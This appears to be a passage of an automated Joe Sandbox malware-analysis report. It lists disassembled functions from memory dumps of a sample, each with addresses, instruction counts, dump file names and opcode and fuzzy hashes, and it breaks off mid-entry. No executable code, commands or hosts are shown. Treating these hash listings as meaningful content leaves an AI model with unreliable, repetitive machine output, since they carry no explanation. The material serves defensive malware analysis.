                                                                                                                                                                                                                                            Function 0042AE24 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                            • Instruction ID: df0643d0793dd6d859baae3aaafaf1000bf3a96435c36713bdd1cf9414b21aca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE41B4A021C3D18BD7358B34A0607BBBBD09F93219F54599DC6D6A7283D7394407CB5E
                                                                                                                                                                                                                                            Function 024BB08B Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                            • Instruction ID: 07081c6e85517efb6beb8e5c0f9faf26f8c54f73b71717f8d55d22052cfc695f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 214191A050C3D18AD7368B3890607FBBBD0EF9325CF14599DC6D6A7682D7354007CB6A
                                                                                                                                                                                                                                            Function 024CB2C2 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                            • Instruction ID: 125aea2c9692d0fa95463962f70663838d94599741315adbf2d539f61c023f6a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0417B79A587144FC264AF68DCC157BB3A1EB96328F2E452DC5E5173A0D7A08C008648
                                                                                                                                                                                                                                            Function 0043B05D Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                            • Instruction ID: 78121dedb2d80148adf018004532891c25ca3ce7b5d6c479fa077a4fb261e508
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C316879A587188FC328EF54E8C427BB3B0EB8B310F2E952D8AE51B350D7648D01878D
                                                                                                                                                                                                                                            Function 024CB2C4 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                            • Instruction ID: 0f4440ee56fbb7332076ba964efd05531101175fd03d96dac9314c778f1dce2a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2317979A5C7148FC364EFA8E8C057BB3A1EB9B318F2E453D85E50B360D7B08D018649
                                                                                                                                                                                                                                            Function 024B60F7 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                            • Instruction ID: 4fcb21aed60f81bacbc27a3a9d5ed321bf18520b38f77429489475439136a81d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6419FB26087908BD734CF24C85179FBAF6EBD1214F498E2CD4CAAB345E73589058B97
                                                                                                                                                                                                                                            Function 0042C45C Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                            • Opcode ID: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                            • Instruction ID: d85d8e7ba49753ff7f36d3ed97c285ab1e5e24199585a0ad528ba1d19501f263
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 888aa382685d0caeac7857589a895e4d05e9bcb5ed8514602e835cd5541883fc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7313B602083A15BD3B58B2864B077F7BD2DF87304F68496DD0C9872A2D7289485C74E
                                                                                                                                                                                                                                            Function 0042ADF4 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                            • Instruction ID: eb231649460b60e8b645cff36354959ad8fc4f47b4bc3ecb8744b755d441be80
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC3191A02083E18BDB358F2491207FBBBE0AB93259F54499DC7D9A7683D7384017CB5E
                                                                                                                                                                                                                                            Function 024BB05B Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                            • Instruction ID: a957eb705bbfd764de56ffb9978b5a67515d2f7f68c0f6869acc222245079ba9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C3161A05087D18ADB368F259020BFBBBE0EF9325DF14499DC6D5A7683D7344047CB6A
                                                                                                                                                                                                                                            Function 024BC6C3 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                            • Instruction ID: f2faa9d64caa712646aadb9824d8d9d9194811941a9737ba8201b6991801226f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE3139741183C24FD7A64B28C8E0BFBBBD2DF83304F28496ED0CA47692CB254046CB26
                                                                                                                                                                                                                                            Function 024B89C0 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                            • Instruction ID: 352fb5028f2a558129d1bf0d30685e94e1c1bc7a4c914f97d63ce2c3003d360b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A3172322183048FC725CF248C806BBB316EF8B748F1C893EDA8583341D374C9018B62
                                                                                                                                                                                                                                            Function 0040D7A2 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                                                            • Opcode ID: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                            • Instruction ID: 608a5c001c9016f47e6d849a3a7bf8eb37f8ca910ed307557679ae7e480cd3ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b6e21541edddda7d0cafdb5479713d3008093deab5e063b60f74b86252a7a36
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F31F139E146009AE325AB598C807377753FBC7300F68D13EE092A32E9DA38AC16874D
                                                                                                                                                                                                                                            Function 0249DA09 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                            • Instruction ID: fdd1e800dfa4eb5b9066ef2130ba445994d89929f8c308095e7a0d58a1adf969
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2731C53CA18501DAEB65BB19CC40B367B67FBC6304F68962ED0C1936A8DB34AC61CB14
                                                                                                                                                                                                                                            Function 0043B9A1 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                            • Instruction ID: 4f1d9a8e55b01d87ed81b452fa3618ff49b1b83c19e4b1c484c24ed6b64955da
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78212921718B550BD728DE3988D132BF7D39BCB210F48D63EC5938B2D6CA34D9054688
                                                                                                                                                                                                                                            Function 024CBC08 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                            • Instruction ID: 9a85a5abcd99f592c4564a956b476160b708ee9b0f22e2b227e8c0448cc8e0f4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36212721B086910BD758DE3DC8D223BFBD39BDB118B18C63FC4A28B6D5CA30D9068608
                                                                                                                                                                                                                                            Function 024A6544 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                            • Instruction ID: 0b6b90f66fea6f4cd754c8f13be98c01af2b010cace34d3c23ed34297428df6a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fbddf629d58ab5b7ce3c6d341b6087eefabcc06d9ed1031e48f954126914271b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D21F334614B019FD761CF28D880B27B7A3EBD6724F298668D5958B799DB30E842CB44
                                                                                                                                                                                                                                            Function 0043BF40 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
                                                                                                                                                                                                                                            • Instruction ID: c284272cbe1354c2bac86839248cf07ee5637eab11ef42c9faf85a1953e6744e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 201c4f8f0819f68cd48f73e785265dbdbac7085615a68ae6b401f2b6715c5eb6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B521217AA08225CFCB04DF24E88466AF3A0FF4A714F5A947ED5858B241D3309E90CF86
                                                                                                                                                                                                                                            Function 024B552B Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
                                                                                                                                                                                                                                            • Instruction ID: 39b67cc6e5634f63fe0bf00e2897fb642465cb59fcd3b610fe5345e318ec2055
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3217eddf26d73e13bed4335cf48e091058d425e1d7b0796f7844dc1e666736a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF1101356443409BCB598F68D8D1ABFF3A1AF86305F88583EA1D2C7391C3B4C8018B56
                                                                                                                                                                                                                                            Function 0043B195 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                            • Instruction ID: 20ca1e341728769f683a14c7d19e02f3155232ce684509dc4d83bd4e8ff0b8df
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72112575A587048FC318EFA4ACC837BB3A4EB8A311F29953D86A647350DB608D118689
                                                                                                                                                                                                                                            Function 024CB3FC Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                            • Instruction ID: de908c3075da78d8ad81e5e3726d8c6e6d3a63167c1b396a5a7bcafa07da8bc7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7118C79A587044FC318EFA8ECC023BB3A0EB96314F29853C85E607750D7708D108609
                                                                                                                                                                                                                                            Function 00433630 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                            • Instruction ID: b28cf3c768fcd90dd8a03dd2320e21e507999ec1ebf4a65f37eb71fdd5601da6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E011EC336051D41EC3268D3C8400565BF930AA7636F5953DAF4B49B3D2D52A8E8A8759
                                                                                                                                                                                                                                            Function 024C3897 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                            • Instruction ID: 8d58df49f5d26529fbe7367cd5e425c053bc4c46518050ed1f987ae9882f9d76
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B911C63BA091D50EC7168D3C8400579BFE30A93535B29C3DEF4B49B2D2C6238D8A8760
                                                                                                                                                                                                                                            Function 004299B0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
